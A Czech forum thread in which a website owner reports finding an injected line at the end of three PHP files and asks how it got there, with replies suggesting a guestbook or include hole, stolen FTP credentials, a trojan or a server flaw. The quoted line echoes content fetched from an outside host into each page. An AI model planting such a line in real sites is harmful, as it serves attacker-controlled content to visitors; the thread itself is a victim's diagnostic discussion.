Zdravím,
tak si brouzdám na svých stránkách a co nevidím... Na spodku stránky jsou nějaký PHP warningy (že není povolená fce file_get_contents, což ale není zas tak důležitý). Protože takovou funkci jsem samozřejmě nepoužíval, stáhl jsem si zdrojáky a co nevidím... Na konci tří souborů jsem našel tento krásný řádek:
< ?php echo file_get_contents("http://xepace.cn/11/1"); ? ><script> </script>
Otázka zní, jak se tam ten kód mohl dostat?
Kdyby to bylo třeba v databázi, tak ještě pochopím, že jsem třeba na něco zapomněl, přestože htmlspecialchars ošetřený mám... Kdyby to byl jinej typ XSS, tak mi pořád není jasný, jak by se ten kód mohl zapsat do PHP skriptu!
Ale ten kód byl prostě na konci těch PHP souborů, který se nijak negenerujou a jsou pořád stejný.
Napadají mě pouze dvě možnosti:
- někdo nějakým způsobem prolomil moje heslo na FTP (netuším, jak by to mohl udělat)
- na serveru WZ je nějakej červ, kterej to tam prostě natvrdo připsal (no, to je jen taková idea, ani nevím, jestli něco takovýho existuje)
Nic jinýho mě nenapadá. Díky za každý nápad. A ne že se teď všichni budou snažit najít díru a hacknout mi to zase ;-)
<HTML>Není díra v guestbooku nebo v použití include?</HTML>
V GB si myslím díra není...
V includu moc nevím, jakou chybu použití máš na mysli...
A i kdyby, tak mi pořád vrtá hlavou, jak někdo něco může zvenku zapsat na PHP souboru na serveru...
Nípal: "Není díra v guestbooku nebo v použití include?"
Vzhledem k tomu, že tady funkce file_get_contents() zakázaná není, tak tipuji že ta chybová hláška se jednala zakázaného http wrapperu. A protože je http wrappper zakázaný, tak:
1) někdo to tam vložil dřív, než se wrapper globálně zakazoval (víc než rok zpátky?) - protože potom už by skrz případné díry neprocpal externí kód - viz chyba o zakázaném http wrapperu.
2) bude problém jinde:
2a) vir/trojan nebo podobná existence v PC majitele
2b) dosud neznámá díra na severu (nebyla by první ani poslední)
Tom
no, osobně si taky myslím, že to bude bod 2...
ad a) to je čistě teoreticky možný - ikdyž antivir mi nic nenachází, dneska je ale možný všechno...
No, asi mi nezbyde nic jinýho, než to zatím neřešit, pokud se to nebude nějak masivně opakovat...
Každopádně díky za reakce.